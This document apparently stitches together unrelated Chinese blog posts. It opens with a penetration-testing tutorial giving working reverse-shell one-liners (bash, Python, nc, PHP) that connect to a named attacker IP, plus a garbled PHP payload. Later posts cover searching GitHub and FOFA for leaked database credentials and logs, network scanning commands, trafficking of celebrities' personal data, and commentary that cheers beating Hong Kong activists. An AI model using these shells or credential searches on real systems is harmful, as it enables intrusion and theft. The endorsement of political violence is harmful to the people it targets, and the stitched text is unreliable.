在我们渗透测试的过程中，最常用的就是基于tcp/udp协议反弹一个shell，也就是反向连接。 我们先来讲一下什么是正向连接和反向连接。 正向连接：我们本机去连接目标机器，比如ssh和mstsc 反向连接：目标机器去连接我们本机 那么为什么反向连接会比较常用呢 目标机器处在局域网内，我们正向连不上他 目标机器是动态ip 目标机器存在防火墙 然后说一下我的实验环境 攻击机：Kali Linux ：47.98.229.211 受害机：Centos 7 ：149.129.68.117（阿里云服务器） 姿势一 bash bash也是最常见的一种方式 Kali监听 nc -lvvp 4444 Shell  复制 centos运行 bash -i >& /dev/tcp/47.98.229.211/5555 0>&1 Shell  复制 执行命令后，成功得到反弹！ 姿势二 python 攻击机Kali还是监听 nc -lvvp 5555 Shell  复制 centos执行 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.98.229.211",27409));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' Python  复制 姿势三 nc 如果目标机器上有nc并且存在-e参数，那么可以建立一个反向shell 攻击机监听 nc -lvvp 5555 Shell  复制 目标机器执行 nc 47.98.229.211 5555 -t -e /bin/bash Shell  复制 这样会把目标机的/bin/bash反弹给攻击机 但是很多Linux的nc很多都是阉割版的，如果目标机器没有nc或者没有-e选项的话，不建议使用nc的方式 姿势四 php 攻击机监听 nc -lvvp 4444 Shell  复制 要求目标机器有php然后执行 php -r '$sock=fsockopen("172.16.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");' Shell  复制 其他的一些高能操作 关于PHP的payload 现在msfconsole中进行简单的配置 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.107 LHOST => 192.168.1.107 Shell  复制 PHP <? php error_reporting(0); $ip = 'x.x.x.x'; $port = 53; if (($f = 'stream_socket_client') && is_callable($f)) { {$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_ strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('s > PHP  复制 ...

公民个人信息泄露事件已屡见不鲜，近日，演员王一博称自己的个人信息被泄露，遭到疯狂骚扰，此类话题再次引发关注。 购买明星私人信息除了能够满足粉丝的猎奇心理外，粉丝可以根据这些信息掌握明星的行程，甚至可以订到与偶像邻座的机票，入住偶像所下榻的酒店以达到追星的目的，因此粉丝经济也助推了贩卖明星信息的非法产业链。对此律师表示，这种行为已经涉嫌触犯刑律中有关侵犯公民个人信息罪的内容。 近日，演员王一博发微博称自己电话号码被泄露，遭到粉丝疯狂骚扰，并贴出电话来电记录，引发公众关注。 ▲网上售卖的某明星个人信息。网络截图 实际上，明星艺人信息泄露已经不是第一次。记者调查发现，明星的各种个人信息在微博、微信、闲鱼等渠道被明码标价公开售卖，这些信息价格低廉，从几块钱到100元不等，500元能够打包购买上百位明星的信息。 广东中安律师事务所合伙人潘翔律师表示，粉丝经济助推了贩卖明星信息的非法产业链，“黄牛”违法售卖明星信息涉嫌侵犯公民个人信息罪。 ━━━━━ 艺人遭遇电话轰炸 8月3日晚上10时许，演员王一博发布微博称，因自己手机号被泄露，自己的生活受到了严重影响，呼吁粉丝不要再去打他的电话。 记者从王一博发布的截图中注意到，从8点09分到8点15分，6分钟内有4个电话进来。另一张截图显示，王一博的未接电话有194个。“别再打我电话了，也别再去买我的号码了”。王一博在微博中说。 微博一经发出迅速引发公众注意。截至8月4日晚间，该微博已经被累计评论36万。网友们纷纷留言表示心疼艺人，呼吁抵制干扰艺人正常生活的行为。同时也有不少网友发问，“明星的信息真的能买到吗？” 在微博输入“明星姓名+具体信息”的方式搜索，很容易就寻找到刷屏招揽生意的“黄牛”。 为了规避风险，这些黄牛大多选择微信交易。“微博只是用来引流的”。其中一位“黄牛”说。 资深追星族小颖（化名）告诉记者，明星信息的买卖在粉丝圈内早已是公开的秘密，而且成本并不高，“如果你想对爱豆（偶像）接送机，那就买他的航班号或者身份证号一查就知道。但是一般不会直接给爱豆（偶像）打电话，这种做法太激进了。” 记者调查发现，售卖明星信息的“黄牛”无孔不入，从航班、酒店、通告到音乐游戏账号、手机号、身份证号乃至户籍，明星信息被明码标价出售。这些信息价格低廉，从几块钱到100元不等，500元能够打包购买上百位明星信息。 ▲根据“黄牛”提供的明星信息，记者查询到了该明星预订的航班行程。网络截图 ━━━━━ 明星身份证信息可打包出售 除了微博，在闲鱼上也有不少售卖明星信息的“黄牛”。他们打着“相遇 相思 相见”的噱头，滚动发布着多位明星的航班动态、手机号、微信等信息。 所有的信息均以缩写代指，如sfz（身份证）、hb（航班）、sjh（手机号）、hj（户籍），一位“黄牛”告诉记者这样主要是为了规避风险，防止被平台封号。 记者随机咨询三位“黄牛”后发现，明星的身份证的价格从几元到几十元不等。记者随机询问了多名当红明星的身份证信息，黄牛表示打包售价100元。“500元买到上百位明星的身份证号”。 “买身份证号其实是为了获得航班信息。粉丝可以在机场查询系统直接搜到明星的乘坐的航班、起飞时间等信息，如果明星已经值机，还可以拿到他的座位号。这样你不仅可以送机，还可以买与明星相邻的座位。”小颖说。她曾经用这个办法购买了不少艺人的身份信息，并成功跟自己的偶像“肩并肩”地坐到了一起。 为了进一步核实出售明星信息的真实性，记者先后查询了王源、易烊千玺、王俊凯三位艺人的身份证信息。随后在机场值机平台输入后，果然查到了其中两位有行程安排的航班信息。 一位“黄牛”告诉记者，如果直接购买明星的航班信息每次只需要10元。 除了“黄牛”，在明星信息地下售卖链条中，还有一个名为“敲机子”的特殊群体。“如果你来不及去机场就可以找他们代为查询，然后发给你，每次只需要5块钱。”小颖说。 ▲“黄牛”向记者提供的明星信息。网络截图 ━━━━━ 明星手机号码30元一条 可售卖的明星艺人个人信息“十分丰富”，除了手机号、身份证号之外，明星游戏账号、户籍、入住的酒店也是售卖的热门信息。 记者联系到的另一位“黄牛”称，其所售卖的艺人手机号均绑定了支付宝或者微信，真实可靠，30元一条。黄牛随后提供了一名艺人的电话号码，随后通过支付宝验证属实。 同时，该“黄牛”还售卖有朱一龙、罗云熙、王鹤隶等近10位艺人的手机号码、QQ号等。 微信上一位“黄牛”向记者介绍，除了手机号码，他手里还有部分艺人的游戏账号和户籍信息。随后对方发来了易烊千玺的王者荣耀账号和肖战的绝地求生账号。 在一位卖家的标价中，吴亦凡的户籍信息只需要50元。 对方给记者发来的户籍照片显示，照片右上方为吴亦凡的素颜证件照，这张照片不仅包括吴亦凡的原名、身份证号、籍贯、家庭地址、文化程度，还包括他婚姻状况和兵役状况。 “酒店信息也是大家买得比较多的。”上个月，小颖和朋友通过“黄牛”顺利地购买到了艺人周震南在长沙下榻的某家酒店信息，并提前赶到蹲守，最终在周震南进出酒店期间“偶遇”成功。 “这些黄牛卖的信息基本上都是真的，因为一旦卖过一次假的，就没人再来找你买了。”小颖说。 这些私人信息是哪里来的？一位“黄牛”告诉记者，自己也是从上家那里拿到的，且招收代理，“代理费100元，拿货很便宜”。 ━━━━━ 律师说法 提供明星信息涉嫌侵犯公民个人信息罪 公民个人信息泄露的事件已屡见不鲜，有关部门也对此加以严厉打击。根据新京报此前相关报道，公民个人细信息泄露有的是相关数据管理人员“监守自盗”，有的则是一些网络黑客通过各种“黑客手段”盗取数据。有的黑客或将数据发布在网站上“炫技”，有的则出售贩卖。这些数据来源则是一些个人信息搜集单位，涉及教育、医疗等各个方面。 广东中安律师事务所合伙人、深圳国际仲裁院仲裁员潘翔表示，明星的个人信息往往来源于机票销售代理、酒店等公共服务单位或者此类单位的网络运营平台，粉丝经济也助推了贩卖明星信息的非法产业链。明星艺人的身份信息、电话号码、家庭地址、家庭成员情况、航班出行信息等均属于法律保护的公民个人信息。 潘翔介绍，向他人出售或者提供明星个人信息，情节严重的，涉嫌《刑法》规定的侵犯公民个人信息罪，判处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。 而根据《最高人民法院、最高人民检察院关于办理侵犯公民个人信息刑事案件适用法律若干问题的解释》，非法获取、出售或者提供行踪轨迹信息、通信内容、征信信息、财产信息50条以上；非法获取、出售或者提供住宿信息、通信记录、健康生理信息、交易信息等其他可能影响人身、财产安全的公民个人信息500条以上；提供前述信息以外的公民个人信息5000条以上，或违法所得5000元以上等情况，均属于“情节严重”范畴。 ...

近日，两位“港独”——所谓“香港民族党”召集人陈浩天与所谓发言人周浩辉窜到台湾，本想着拉帮结派求温暖，却在台湾也遇到爱国人士，挨了一顿打，挨了一顿骂，骂他们“卖国贼”，让他们滚。 这段视频看得好过瘾！打得好！骂得好！即使“脸上泛绿”的台湾岛，也有铁骨铮铮的汉子。在一些宵小之辈的撺掇下，台北市市长柯文哲称要“严办”，如果爱国行为都要被“严办”，柯文哲将在历史上留下可耻的一笔记录。 这是另一个“港独”带头闯驻港部队军营招显聪被扇大嘴巴。 看到“港独”被打，我们心里觉得尤其解气。要知道，和这些“港独”讲道理，它们也是骂不醒的，只能“打”醒。当然光靠扇它们大嘴巴也不行，但可这至少是个补充，是个配合。作为一个普通的爱国者，我们能干的，也就这么多了！ 无论您有多忙，请花1秒钟时间把它放到你的圈子里！可能您的朋友也需要！谢谢！ 免责声明 图文来源于网络整理，本平台对转载、分享的内容、陈述、观点判断保持中立，不对所包含内容的准确性、可靠性或完善性提供任何明示或暗示的保证，仅供读者参考。如涉及版权问题，请联系平台管理员予以更改或删除。 ...

声明：文章只做技术交流，请勿用于非法用途 github 上的配置信息泄漏 GitHub是一个面向开源及私有软件项目的托管平台，因为只支持git 作为唯一的版本库格式进行托管，故名GitHub。 打开github官网。搜索字符串jdbc:mysql。 选择: code 和 Recently indexed。 这样就查询出含 jdbc:mysql的最新更新的代码。图中可以看到，已经查到了腾讯云数据库连接地址和账号密码。 尝试使用 navicat 连接后，成功连接。 无论密码和用户名多复杂，一旦泄漏，也就没用了 当然，由于GitHub本身的搜索算法的原因，结果可能和我们想的不一样。但是手动查找后，还是能找到一些成果的。 *国内的码云也可以用类似的方法去搜索，不过效果不如GitHub。 日志文件泄漏 网络空间资产检索系统（FOFA）是世界上数据覆盖最完整的IT设备搜索引擎，拥有全球联网IT设备最全DNA信息。探索全球互联网的资产信息，进行资产及漏洞影响范围分析、应用分布统计、应用流行度态势感知等。 打开FOFA搜索引擎，输入：body="log.txt" && country=CN。便可以查找到有关log.txt的IP。 点开一个可以看到： 当然，这个里面没有什么敏感的信息。细心去找的话，还是能找到不少的。 除了搜索日志，也可以搜索sql文件、后台路径等等。 除此之外，大家熟知的可能还有 google搜索、钟馗之眼等等，都可以用来搜索具有某种特征的IP，合理利用就可以查询到大量信息。所以，在日常工作生活中，需要多多注意一些敏感信息的使用，做好个人信息、公司信息的保护。 ...

妹子不要被网剧骗了...CTFer才不是电视上那样..1.头像基本是这个画风 2.讲话基本是这个画风3.书包这个画风4.表情包这个画风5.比赛真实画风（脸都 了 给品品还是不是你韩的类型 （大师傅见侵删 6.CTFer为女朋友准备的惊喜 A.一大桶星球杯（？）B.土掉渣的刻有1314字样的水杯（？）就是这个C.你死也看不懂的浪？漫？惊？喜？ 就是一大堆代码截图 然后说我有了他计算机的最高权限之类的 我是真的emmmmm？？ 还有给你一堆加密的文字 说里面藏了一个秘密 （呵 好像基本全是母胎单身.... 但似乎脱单了的基本都是很粘人的好男朋友.. 单纯的角色.. 7.平时跟你线下聊天的画风 哈哈哈 这个A1B2C3D4竟然”)/了我的$&;我他妈分分钟就’_~>€ 然后他的&@就不能—#^我的***了 。笑死我了。你在没在听啊？你咋不理我。哼！（撅嘴。8.日常生活 A.到一个地方不允许连Wi-Fi B.电脑上贴一堆软件图标（？ C.无论多热 无论多重 约会必带包 书包里必有一到两台电脑 无论吃饭排队等人 随时打开看两行代码 D.要以拍照片的形式记住自己一些信息 必须斜着拍 反正不能正经拍 说会泄漏被盗用 E.“B站源码泄漏 你快改密码”“XX平台有漏洞 你最近别用了” F.VX QQ全是各种技术群置顶 .... 然后闲下来把没看的消息从头看到尾 ...并配上一张表情包➕tql G.复读鸡 等等等等等等....... 总之画风大抵就是一瓶5L农夫山泉（不盖盖子）在电脑桌旁➕一件皱巴巴的衬衫➕齁背➕内心脆弱➕脸上油腻腻➕运动无能的感觉..... 但是真的很贴心 （虽然很蠢 虽然我说了一大堆 但是CTFer无论如何也是人类中的一员 还是各有特色（？）... 所以妹子不需要限定男朋友的范围... 就.. 随缘吧。（嘻 嘻） （反正我这辈子是栽进去了） （溜走） ...

大家好，我是毒蜂。 从2017年所爆发的全球勒索病毒，把暗网这个词带入了大众的视野。 暗网不负众望，2018年再次拉向高潮——华住旗下3千万酒店开房数据，在暗网中文论坛出售。 不幸中的万幸，这份数据并没有传播在互联网上，不然得有多少情侣夫妻展开男女混合双打。 再加上大量自媒体一篇又一篇夺人眼球的文章诞生，暗网成为了恐怖的代名词。 但在反观暗网目前的现状时，里面确实存在着非法交易，不过远没有自媒体笔下所描述的如此恐怖。 买凶杀人，在我们大天朝如此安全的环境下，想都不要想。 普通人没人会花钱杀你，除非你跟别人有深仇大恨，比如抢人老婆。 再说了，杀完人后你能躲避的了密密麻麻的道路摄像头吗？ 所以呐，不要总觉得暗网多神秘，其实就是跟咱中国的黑产圈差不多。 只不过中国安全，没什么杀手。 今天这篇文章，就是想带你们正确的认识暗网。 什么是暗网。 可以这样理解，我们平常访问的网络称之为表层网络，例如百度，谷歌，B站，YouTube，等所有的网站都属于表层网络，那些需要科学上网才能访问的国外网站同样也是。 在这片表层网络之下，还有一个深层网络，想要访问它必须得通过特定的浏览器，连接其网桥才能访问，大概跟我们平常用的**屏蔽敏感词**软件差不多。 这个网络称之为:暗网。 因为有一定的门槛，以及匿名性较为良好，受到了比较多的犯罪分子喜爱，他们在里面搭建非法网站去避免警方追踪。 这是另一个平行互联网世界。 任何事物都得有个起源，包括孙悟空也不是凭空出现的-—它娘是块大石头。 暗网也不例外，只不过它有两个爹，一亲爹和一养父，但这俩爹脑子都不大好使。 为什么这么说呢？ 1995年，美国海军为了避免体系内的网络通讯不被人追踪，就投入资金让美国海军实验室研究一个相对安全的通讯工具。 这个通讯工具很快就被研发出来，也就是早期的暗网，那个时候它还不叫暗网，叫做Tor网络 这个Tor网络的加密方式非常奇特，跟一洋葱似的，美国海军的通讯就被藏在洋葱的核心里，外面有着一层一层的洋葱皮保护着。使用者通过多个节点进行掩盖痕迹访问网络。 所以Tor网络也称为洋葱网络。 它能帮助美国海军独立在网络世界里，成为另一个体系。 可惜好景不长。 一直到2004年，美国政府陷入了财政紧缺，就撤掉了对Tor网络的资金支持，还把这个项目开源到了网上。 Tor不但被亲爹抛弃，还丢到垃圾桶里。 但Tor这孩子长得水灵，招人稀罕，很快就有一个叫电子前哨基金会的自由主义网络组织，接管了Tor网络项目，并且投入资金与技术支持。 可谓是一把屎一把尿养大。 这个自由组织就是Tor的养父，不过这个爹的脑子指定也有点毛病。 等Tor长大成熟后，养父把它对外公开使用，对外公开使用，至于为什么，人家不说，咱也不敢问。 这个自由组织是美国政府监听互联网事件最大的反对组织之一。 在这之前，他们曾揭露过美国的棱镜计划。 我想，你们应该明白为什么把TOR网络对外开放使用了吧？ 但这步棋是臭棋！ 在这个基金会对外开放使用Tor网络后，一些心里揣着怀心思的人利用Tor网络建立了一批又一批的违法犯罪网站，就是这样，暗网一词就此诞生。 从被亲爹抛弃，再到被养父利用。 你说暗网这孩子悲剧不悲剧？自媒体经常说，我们平常访问的网络其实不足暗网的十分之一。 夸张性描述 我求求你们别扯犊子了。 相比表网而言，暗网的规模要小的多，因为Tor的网络节点宽带压根支撑不起那么庞大的网络流量！ 其次就是暗网真的那么安全吗？ 答案是否定的。 当今文明社会，全球的执法机构都无法容忍犯罪行为扩散，即使它的匿名性良好，警方仍然能找到更多的侦查方式。 例如国外有俩安全调查员，通过爬虫技术批量爬取了一个非法网站里的商品图片，通过这些照片遗留的EXIF信息整理出了一张商家物理位置分布图。 通过照片EXIF信息确认的位置分布图又或者根据浏览器指纹，SSH指纹，图片指纹，运单等技术侦查手段，找到暗网买卖双方信息 比如曾经大名鼎鼎的丝绸之路就是一个很好的例子——从1.0 版本到 3.0  版本，已经被警方打击了四次。 以前的丝绸之路，以贩卖毒品枪支为主 期间警方为了抓捕第一代创始人——乌布利希，扮演多米尼亚共和国的毒品走私犯，以花10亿美元购买丝绸之路网站为由，去接近乌布利希 最终，乌布利希在一家图书馆被抓获，荣获无期徒刑奖励一份，虽然功劳并不在卧底那。 当然，一代创始人被抓后，并没有因此结束，丝绸之路的故事还在继续，只不过写这故事的人不是他了而已。 因为刑罚第一课就说明了原因。 人类无法彻底消灭犯罪。 那么真实的暗网是否全是非法网站？ 答案同样是否定。 在暗网中的非法网站只占据百分之五十，例如自媒体常说的枪支毒品贩卖一类网站。 他们属于商业类站点。 这类商业非法网站，主要是以毒品，枪支，假钞，护照，银行卡，比特币洗钱，雇佣黑客与杀手等一类服务为主。 此类网站只占据暗网的百分之十五。 其次属于成人色情类只占据百分之二，以正常色情片以及儿童色情内容为主。 占据比例最少的属于政治以及异教徒网站，主要是发布反对国家政权言论，激进主义言论，传教等，占据暗网比例的百分之一。 其实在墙外也有着抹黑咱们国家的中国人，比如随想编程这个狗逼，那为什么没人抓他？ 我觉得就一个原因——跳梁小丑不值一提。 既然不喜欢这个国家，就移民出去，大可不必拿着大喇叭天天说坏话。 就像有的人不喜欢我我博客一样，不看就行了，犯不着跑到评论区喷人。 嘴臭王者。 最后剩余的就是艺术以及音乐类网站还有那些无法访问，或无效的网站，占据了百分之五十。 没错，暗网将近一半的都不是非法网站。 那我们国家有暗网吗？ 有——暗网中文论坛。 其模式与丝绸之路相差不了多少——都是买卖双方进行交易的一个担保平台，例如卖家发布需求或广告，买家通过中文论坛的担保功能进行支付，等到货后平台会自动把钱打到卖家手上。当代暗黑版淘宝。 这个中文论坛因为2018年连续几件的信息泄露，现在成为了威胁情报的重要来源。 除此之外，还备受国家安全局，警察，国内黑客，白帽子，等群体关注。 马云说过让天下没有难做的生意，暗网中文论坛同样也是，不过阿里不违法。 中文论坛里的交易几乎涵盖了全部的黑色产业链，上到毒品迷药出售，下到个人信息数据贩卖，应有尽有。 毒品主要以，Kush，og，ak为主，在暗网中文论坛以及telegram的黑产群上并不少见。 Kush是美国俚语里大麻的意思。 Og同样也是大麻，属于当代大麻世界的潮流品种之一。 至于他们在国内是如何将毒品寄出的，暂时还不了解，毕竟干他们这一行的比黑产还要谨慎。 迷药一直是常见货，无论是黑市上，还是那些为钱不怕死的狗逼微商们，甚至大街上写着的小广告都能看到有。 例如最常见的三唑仑安眠药，很多人拿去酒吧迷晕女孩捡尸体。当然，也有个别不怕死的老板想卖枪的，这个就不评论了。 我怕他们取我狗命。 我在百度暗网时，看到推荐的搜索，把我笑成了傻逼。这个问题在很早之前就有人问过我，这得感谢把暗网吹嘘的神乎其技的自媒体们。 针对“上暗网会不会有生命危险”的问题。 首先正常访问暗网是百分百没问题的，但不要在里面购买东西，一方面是暗网里存在非常多的欺诈，另一方面暗网里有些网站是警方搭建的钓鱼网站。 假设你在里面与人发生争执，不要害怕，没人会因为这点小事去杀你灭口，如果真有，继续往下看。 要知道暗网匿名性非常优秀，对于反追踪，我认为普通人没有能力做到，如果对方是个黑客高手，能追查到的信息只有真实IP地址。 IP地址很难精确到具体位置，这一点大可放心，哪怕精准到你的物理位置，你的个人信息一概不知，姓名，长相，身高，等等。 但对于未知事物，我们仍需警惕，能不得罪人尽量不得罪。如今进入暗网的方法变得越来越简单，不需要技术，不需要知识，只需要一个软件就能轻松访问。 能让大众探索未知事物是好事，但暗网门槛变得如此低，确实不可行。 暗网交流群，群文件会持续更新TOR相关东西、暗网网址等。。。QQ群号：979727860 点击链接加入群聊：https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

因为很多和谐的原因，本人不愿意在Kirin博客上就涉港澳台事件发表意见。但是近期的香港元朗暴力、恐怖事件的发生，实在让我安耐不住内心的愤怒。 “一国两制”伟大构想在香港世间二十多年以来，香港得到了除外交国防意外的高度自治。香港依托独特的优势，本来可以继续腾飞50年。但是近年来，一小撮“港独”分子（社会败类）不断制造骚乱。 个人认为，香港近年来暴力、暴力事件之所以愈演愈烈，很大程度上归根于香港司法体系。香港终审法院17名常任和非常任大法官中，仅有两人为中国香港籍，其余均为外国国籍或双重国籍。可笑吗，中国主权下的领土，司法体系最高级别法官居然有外国人，而且还是压倒性的多数。 这样看来，对于之前新闻报道的几名香港警察因为依法处置暴乱、暴力分子而被判刑撤职的事情，我们就很容易理解了。外国反华势力的黑手不是近几年才伸进香港，而是他们的黑手从来都没有收回过。最令人惊讶的是，这黑手一只牢牢把握着香港社会稳定的命门——司法部门。 因为之前香港法院对警务人员的不公正裁决，导致很多警员丢了饭碗。看看这次的元朗暴力、暴力事件，警务人员本可以依法及时处置，却因为忌惮法院的判例而畏手畏脚。 很多人都在叫嚷着找到香港暴力事件的幕后黑手，虽然没有具体的目标，但是大致范围是确定的。那只扰乱香港秩序的黑手，一定就是这名单中的某个或某几个人。...

UDP简介： UDP（User Datagram Protocol）是一种无连接的协议，在第四层-传输层，处于IP协议的上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点，也就是说，当报文发送之后，是无法得知其是否安全完整到达的。 UDP显著特性： 1.UDP 缺乏可靠性。UDP 本身不提供确认，超时重传等机制。UDP 数据报可能在网络中被复制，被重新排序，也不保证每个数据报只到达一次。 2.UDP 数据报是有长度的。每个 UDP 数据报都有长度，如果一个数据报正确地到达目的地，那么该数据报的长度将随数据一起传递给接收方。而 TCP 是一个字节流协议，没有任何（协议上的）记录边界。 3.UDP 是无连接的。UDP 客户和服务器之前不必存在长期的关系。大多数的UDP实现中都选择忽略源站抑制差错，在网络拥塞时，目的端无法接收到大量的UDP数据报 4.UDP 支持多播和广播 利用nmap扫描 nmap -sU -T5 -sV --max-retries 1 192.168.0.1/24 -p 500 Shell  复制 或者 nmap -sU -T4 -sV 192.168.0.1/24 Shell  复制 msf扫描 msf5 > use auxiliary/scanner/discovery/udp_probe msf5 auxiliary(scanner/discovery/udp_probe) > show options Module options (auxiliary/scanner/discovery/udp_probe): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads msf5 auxiliary(scanner/discovery/udp_probe) > set RHOSTS 192.168.0.1/24 RHOSTS => 192.168.0.1/24 msf5 auxiliary(scanner/discovery/udp_probe) > set THREADS 10 THREADS => 10 msf5 auxiliary(scanner/discovery/udp_probe) > run Shell  复制 或者执行 use auxiliary/scanner/discovery/udp_sweep Shell  复制 ARP简介： ARP,通过解析网路层地址来找寻数据链路层地址的一个在网络协议包中极其重要的网络传输协议。根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机，并接收返回消息，以此确定目标的物理地址 nmap扫描 nmap -sn -PR 192.168.0.1/24 Shell  复制 普及 osi七层模型图解 ...

中国共产党中央委员会、中华人民共和国全国人民代表大会常务委员会、中华人民共和国国务院、中国人民政治协商会议全国委员会沉痛宣告：中国共产党的优秀党员，久经考验的忠诚的共产主义战士，杰出的无产阶级革命家、政治家，党和国家的卓越领导人，中国共产党第十二届中央政治局委员、中央书记处书记，第十三届、十四届、十五届中央政治局常委，国务院原总理，第九届全国人民代表大会常务委员会委员长李鹏同志，因病医治无效，于2019年7月22日23时11分在北京逝世，享年91岁。 李鹏同志1928年10月生，四川成都人。他出身革命家庭，幼年时父亲英勇就义，少年时期受家庭影响，主动接受革命思想，立志投身革命事业。1941年3月，他到延安参加革命工作，接受革命理论和科学文化知识教育，1945年11月加入中国共产党。解放战争时期，他响应党组织号召奔赴前线，历任晋察冀电业公司技术员，哈尔滨油脂厂协理、党支部书记。1948年9月，根据党组织安排到苏联留学。1955年回国后，他主动要求到基层工作，历任丰满发电厂副厂长、总工程师，东北电业管理局副总工程师、调度局局长，阜新发电厂厂长。1966年至1979年，历任北京供电局党委代理书记、革委会主任，北京电业管理局局长、党组书记。“文化大革命”期间，受到冲击，但他坚持党性原则，实事求是，进行斗争。1979年4月起，历任电力工业部副部长、党组成员兼华北电业管理局党组书记，电力工业部部长、党组书记，水利电力部副部长、党组副书记，他创造性地贯彻党中央“电力要先行”战略，提出电力适度超前发展，推动我国在电站建设和电力生产、电网管理等方面取得长足进步，是我国电力工业的杰出领导人、核电事业的重要开创者。1983年6月，李鹏同志任国务院副总理，1985年9月在中共十二届五中全会上增选为中央政治局委员、中央书记处书记。他分管能源、交通、重点建设项目等工作，参与研究“七五”计划能源交通方面的发展方针，推动建立综合统一的交通运输体系和基本建设体制改革，加快重大技术装备研制步伐。1987年11月，李鹏同志在中共十三届一中全会上当选为中央政治局委员、常委，同月在六届全国人大常委会第二十三次会议上被任命为国务院代总理。1988年4月，在七届全国人大一次会议上被任命为国务院总理。他坚决贯彻治理整顿和深化改革的方针，探索对国民经济进行宏观调控的新手段和新方法，推动我国经济摆脱困境、进入新的发展时期。1989年春夏之交的政治风波中，在以邓小平同志为代表的老一辈无产阶级革命家坚决支持下，李鹏同志旗帜鲜明，和中央政治局大多数同志一道，采取果断措施制止动乱，平息反革命暴乱，稳定了国内局势，在这场关系党和国家前途命运的重大斗争中发挥了重要作用。1989年6月中共十三届四中全会后，作为以**屏蔽敏感词**同志为核心的中央领导集体的重要成员，李鹏同志高举邓小平理论和“三个代表”重要思想伟大旗帜，深入贯彻党的十一届三中全会以来的路线方针政策，为党和国家事业发展殚精竭虑。1992年10月，李鹏同志在中共十四届一中全会上再次当选为中央政治局委员、常委。1993年3月，在八届全国人大一次会议上，他再次被任命为国务院总理。邓小平同志发表南方谈话后，他积极支持、宣传和贯彻邓小平同志改革开放的思想主张，坚决贯彻党的十四大精神，加快社会主义市场经济体制改革步伐，扩大对外开放，加强和改善宏观调控，在党中央领导下主持制定“九五”计划，布局建设一批国家重大项目，推动国民经济持续快速健康发展。1997年9月，李鹏同志在中共十五届一中全会上又一次当选为中央政治局委员、常委。1998年3月，在九届全国人大一次会议上，他当选为全国人民代表大会常务委员会委员长。 到中央工作后，李鹏同志兼任国家教育委员会主任、国务院环境保护委员会主任、中央专委会主任、国家科技领导小组组长、中央外事工作领导小组组长等，在科技、教育、环保、外交和国防工业等领域倾注了大量心血。他贯彻“科学技术是第一生产力”思想和优先发展教育战略，大力推进科技体制、教育体制改革，认真落实知识分子政策，提高了国家整体科技实力，为改革开放各条战线输送了大批人才。他强化环境管理，在实践中完善环境保护基本国策和“三同步”“三统一”战略方针，为初步走出一条具有中国特色的环境保护道路作出重要贡献。他坚决贯彻执行独立自主的和平外交政策，高举和平共处五项原则旗帜，组织、参与大量卓有成效的双边、多边外交活动，为开创全方位外交新格局作出重要贡献。他坚决贯彻中共中央关于统一战线和人民政协的方针政策，贯彻“一国两制”方针，参与领导香港、澳门回归各项工作。他在三峡工程科学民主决策和建设中发挥了重要作用，积极支持推动我国载人航天事业发展。李鹏同志是我国社会主义市场经济体制的重要开创者、忠实践行者、积极推动者。他始终坚持从中国国情出发，正确处理改革发展稳定关系，统筹推进财税体制、金融体制、价格体制、外贸体制、社会保障制度和国有企业改革，稳定农村政策，支持经济特区发展，平稳推进计划经济体制向社会主义市场经济体制转变，为20世纪末我国初步建立社会主义市场经济体制发挥了重要作用。李鹏同志是中国特色社会主义民主法治建设的重要领导者。他担任宪法修改小组组长主持起草宪法修正案草案并经全国人大通过，以国家根本大法形式确立了邓小平理论的指导思想地位，明确依法治国的基本方略、社会主义初级阶段的基本经济制度和分配制度以及非公有制经济重要作用等内容，任期内审议通过法律和有关法律决定草案百余件，推动了以宪法为核心的中国特色社会主义法律体系初步形成。李鹏同志对人民群众特别是困难群众饱含深情，高度重视扶贫工作，十分关心国有企业下岗职工的冷暖。 2003年3月，李鹏同志不再担任全国人大常委会委员长职务。从领导岗位上退下来以后，他坚决拥护和支持以**屏蔽敏感词**同志为总书记的党中央，坚决拥护和支持以习近平同志为核心的党中央，关心中国特色社会主义伟大事业，坚定支持党风廉政建设和反腐败斗争。 李鹏同志的一生，是革命的一生、战斗的一生、光辉的一生，是全心全意为人民服务、为共产主义事业奋斗的一生。他的逝世，是党和国家的重大损失。我们要学习他的革命精神、崇高品德和优良作风，更加紧密地团结在以习近平同志为核心的党中央周围，不忘初心、牢记使命，为决胜全面建成小康社会、夺取新时代中国特色社会主义伟大胜利、实现中华民族伟大复兴的中国梦而努力奋斗。 李鹏同志永垂不朽！ ...

91多位名人被捕，夯先生、秦先生、仓本C仔、呆哥等，有几位还是外企高管或者海外留学生， 虽然91服务器在国外，侦破难度很大，不过都难不住JC，节目记录了大神们的作案手法和设备。 地址：http://tv.cntv.cn/video/C28169/b27781706db1474697fcdd0e8153b4ea ...

上天并不会因为你是女孩子，就格外的对你怜香惜玉的，反而女孩子要更加的努力，为了以后可以要得起自己喜欢的一切。 想一个人不一定就要见这个人，有时候想念比相见舒服多了， 想念总是可以带着一种甜蜜，而见面了却总是莫名其妙的就吵架。 ...

因为喜欢你，所以觉得为你做一切都是值得的。就算是付出再多的时间和汗水，也不会抱怨一句，只希望你能开心。 喜欢一个人的时候，就用尽全身心的力气去爱，好好的享受当下珍惜彼此。爱是永恒的，但是爱一个人却是有很多波折困难的，好好的珍惜吧。...

